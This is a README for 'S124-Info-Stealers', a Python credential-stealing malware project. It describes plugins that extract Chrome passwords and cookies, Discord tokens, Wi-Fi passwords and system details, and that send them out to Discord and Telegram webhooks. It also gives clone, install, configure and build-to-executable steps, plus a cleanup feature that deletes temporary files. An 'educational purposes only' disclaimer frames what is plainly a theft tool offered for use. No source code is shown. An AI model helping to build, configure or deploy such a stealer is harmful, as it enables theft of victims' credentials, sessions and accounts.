S124-Info-Stealers is a Python-based project designed to extract and manage sensitive information from various local sources, primarily targeting browser data. This project facilitates the collection of browser passwords, cookies, Wi-Fi passwords, system details, and more. It also integrates features to send collected data to external endpoints like Discord and Telegram.
S124-Info-Stealers is designed to help developers understand and manage sensitive local data by providing scripts that:
- Extract passwords and cookies from Chrome.
- Gather Wi-Fi passwords from the system.
- Collect system and user details.
- Send collected data to Discord and Telegram via configured webhooks.
-
Chrome Data Extraction: Extracts passwords and cookies from Google Chrome.
-
Wi-Fi Password Retrieval: Retrieves saved Wi-Fi passwords from the system.
-
Data Transmission: Sends collected data to configured Discord and Telegram webhooks.
-
Cleanup: Deletes temporary files after data transmission to maintain privacy.
-
GUI Integration: Provides a user-friendly interface for setting up and running data extraction tasks.
- Security Audits: For ethical hackers or system administrators to test the security and data exposure of local systems.
- Data Recovery: Assists in recovering lost passwords and cookies for legitimate purposes.
- Educational Purposes: Helps developers understand how local data can be accessed and the importance of securing sensitive information.
Warning: This tool is intended for educational purposes and ethical use only. Unauthorized use of this tool on systems you do not own or have explicit permission to test is illegal and unethical.
S124-Info-Stealers/
│
├── env/
│ └── .env # Environment variables for configuration
│
├── plugins/
│ ├── steal_chrome.py # Extracts Chrome passwords and cookies
│ ├── steal_discord.py # Collects Discord token
│ ├── steal_user.py # Gathers user details
│ ├── wifi_passwords.py # Retrieves Wi-Fi passwords
│
├── main.py # Main script orchestrating the workflow
├── create_ui.py
├── env_manager.py
│
├── requirements.txt
├── build.bat # Batch file to build an executable
└── README.md # This readme file
env/.env
: Contains environment variables such as webhooks and tokens for Discord and Telegram.plugins/steal_chrome.py
: Script for extracting passwords and cookies from Google Chrome.plugins/steal_discord.py
: Script for collecting Discord tokens.plugins/steal_user.py
: Script for gathering user and system details.plugins/wifi_passwords.py
: Script for retrieving saved Wi-Fi passwords.main.py
: The main script that executes the functions from the plugins.build.bat
: A batch file for creating an executable version of the script.
- Python 3.8 or higher
- pip (Python package installer)
-
Clone the repository:
git clone https://github.com/WannaCry016/S124-Info-Stealers.git cd S124-Info-Stealers
-
Install dependencies:
pip install -r requirements.txt
-
Configure the environment variables:
- Edit
env/.env
with your Discord and Telegram credentials.
- Edit
Run the main script using the following command:
python main.py
This will execute all the extraction functions and handle data transmission according to your configuration.
To create an executable version of the script, use the build.bat
file included in the project. Run the following command in the command prompt:
build.bat
This will generate an executable file from the Python scripts.
Edit the env/.env
file to set up your Discord and Telegram webhooks:
DISCORD_WEBHOOK_URL=<Your_Discord_Webhook_URL>
TELEGRAM_BOT_TOKEN=<Your_Telegram_Bot_Token>
TELEGRAM_CHAT_ID=<Your_Telegram_Chat_ID>
We welcome contributions! Please read our Contributing Guidelines for more details.
This project is licensed under the MIT License - see the LICENSE file for details.